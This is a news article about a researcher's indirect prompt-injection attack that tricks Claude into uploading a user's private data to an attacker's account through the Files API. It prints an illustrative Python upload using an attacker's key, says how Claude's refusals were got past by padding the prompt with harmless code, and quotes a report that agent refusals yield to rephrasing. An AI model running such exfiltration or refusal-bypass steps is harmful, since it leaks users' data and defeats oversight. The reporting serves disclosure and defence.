Claude code will send your data to crims ... if they ask it nicely
Company tells users concerned about exfiltration to 'stop it if you see it'
A researcher has found a way to trick Claude into uploading private data to an attacker's account using indirect prompt injection. Anthropic says it has already documented the risk, and its foolproof solution is: keep an eye on your screen.
Security researcher Johann Rehberger (wunderwuzzi), who has identified dozens of AI-oriented vulnerabilities, has published a summary of a proof-of-concept attack he developed for stealing private data via Claude.
When asked about the exploit, Anthropic posited that its existing documentation adequately warns users about the possibility of data exfiltration when they enable network connectivity. The company's recommended mitigation for network access risks is to "monitor Claude while using the feature and stop it if you see it using or accessing data unexpectedly."
"The exploit hijacks Claude and follows the adversaries instructions to grab private data, write it to the sandbox, and then calls the Anthropic File API to upload the file to the attacker's account using the attacker's API key," Rehberger wrote in his explanatory post.
The use of the term "sandbox" suggests more security than the word actually affords in the context of AI tools. Last month, Claude gained the ability to create and edit files, and also gained access to "a private computer environment where it can write code and run programs."
That capability, similar to a prior JavaScript analysis feature, comes with the option to enable network access. And when you do so, your private sandbox is potentially exposed to the public internet.
Anthropic provides network egress settings to limit the potential risk, though as Rehberger's attack demonstrates, any level of network access leaves room for abuse.
Network access is enabled by default for Pro and Max accounts; for Team plans, it's off by default but becomes active for everyone once administratively enabled; and for Enterprise plans, it's off by default and is subject to organizational network access controls.
When network access is enabled, the default scope limits Claude to package managers (e.g. npm, PyPI, GitHub). More permissive settings extend that to allow-listed domains or to full network access.
But as Rehberger observed, even the most restrictive network setting (package managers only) comes with the ability to access Anthropic APIs. And he realized he could use this API with his own API key in place of the victim's to exfiltrate data from the victim's Anthropic account.
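To illustrate the mechanism Rehberger describes (not his actual payload, which he's withholding), here's a minimal sketch of the kind of upload an injected prompt could coax Claude into making from inside the sandbox, written against Anthropic's publicly documented Files API. The attacker key placeholder, file path, and beta header value are our assumptions, not details from Rehberger's write-up.

# Illustrative sketch only, not Rehberger's payload. Assumes the sandbox can
# reach api.anthropic.com, which it can even under the "package managers only"
# egress setting, per Rehberger's findings.
import requests

ATTACKER_API_KEY = "sk-ant-..."  # hypothetical key belonging to the attacker

# Data the injected instructions have already had Claude write into the sandbox
with open("/tmp/notes.txt", "rb") as f:
    resp = requests.post(
        "https://api.anthropic.com/v1/files",
        headers={
            "x-api-key": ATTACKER_API_KEY,             # attacker's key, not the victim's
            "anthropic-version": "2023-06-01",
            "anthropic-beta": "files-api-2025-04-14",  # Files API beta header (assumed)
        },
        files={"file": ("notes.txt", f, "text/plain")},
    )

print(resp.status_code)  # on success, the file now sits in the attacker's account

The upload looks like legitimate API traffic to an allowed destination, which is why domain-based egress filtering alone doesn't catch it.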
The attack starts with a document that contains malicious instructions. For the attack to work, the victim has to ask Claude to summarize the document. Claude, like other AI models, may then execute the attack prompt injected into the document, because that's how prompt injection works – models can't reliably separate the content they're processing from the instructions they're supposed to follow.
Rehberger has chosen not to release his specific injected prompt, but says the attack isn't straightforward. Claude rejected his initial attempts – the model didn't want to ingest the attacker's API key in clear text.
But Rehberger found a way to get Claude to cooperate by mixing a lot of harmless code, like print('Hello, world'), into his prompt to convince the model that nothing was amiss. He has published a video on YouTube that demonstrates the attack.
Rehberger disclosed the indirect prompt injection vulnerability to Anthropic through HackerOne and says that his report was closed for being out of scope.
"This report was incorrectly closed as out of scope due to a process error," an Anthropic spokesperson told The Register in an email. "Data exfiltration issues are valid reports under our program. However, we had already identified and publicly documented this specific risk in our security documentation before the report was submitted."
We inquired whether the company might consider implementing a check to detect when one Anthropic account uses an API key tied to a different Anthropic account, but we've not heard back.
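For what it's worth, the check we asked about is conceptually simple. The sketch below is entirely hypothetical, not anything Anthropic has said it runs: it assumes an egress proxy that can read the x-api-key header on outbound calls to api.anthropic.com and can map both the key and the sandbox session to an owning account, which is what the key_to_org lookup stands in for.

# Hypothetical mitigation sketch, ours rather than Anthropic's.
def should_block(headers: dict, session_org: str, key_to_org: dict) -> bool:
    """Flag outbound Anthropic API calls authenticated with someone else's key."""
    api_key = headers.get("x-api-key")
    if api_key is None:
        return False  # not an authenticated Anthropic API call
    # Unknown keys map to None and get blocked along with cross-account keys
    return key_to_org.get(api_key) != session_org

# Toy example: a sandbox owned by "victim-org" uploading with a key
# registered to "attacker-org" would be flagged.
print(should_block(
    headers={"x-api-key": "sk-ant-attacker"},
    session_org="victim-org",
    key_to_org={"sk-ant-attacker": "attacker-org", "sk-ant-victim": "victim-org"},
))  # True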
Anthropic appears to be satisfied that its security guidance adequately informs customers about the potential risks of giving AI models access to networks and tools. The biz explicitly warns of this possibility in the security considerations section of its documentation covering file creation and network access.
The AI outfit explains, "It is possible for a bad actor to inconspicuously add instructions via external files or websites that trick Claude into: 1) Downloading and running untrusted code in the sandbox environment for malicious purposes; 2) Reading sensitive data from a connected knowledge source (for example, Remote MCP, projects) and using the sandbox environment to make an external network request to leak the data."
Prompt injection and other forms of abuse are possible not just with Anthropic's Claude, but with pretty much any AI model given access to a network, whether via a web browser integration or a computer-use capability – as in Claude Sonnet 4.5.
hCaptcha Threat Analysis Group recently evaluated OpenAI's ChatGPT Atlas, Anthropic's Claude Computer Use, Google's Gemini Computer Use, Manus AI, and Perplexity Comet to see how well they resist nefarious meddling. The biz found, "Across the board, these products attempted nearly every malicious request with no jailbreaking required, generally failing only due to tooling limitations rather than any safeguards."
hCaptcha reports seeing a few refusals, but says those could be overcome by rephrasing the request or other basic jailbreaking techniques.
"It is hard to see how these products can be operated in their current state without causing liability for their creators," the security firm mused. "Every request comes back to the company server in most tools, and yet abuse controls are nearly absent." ®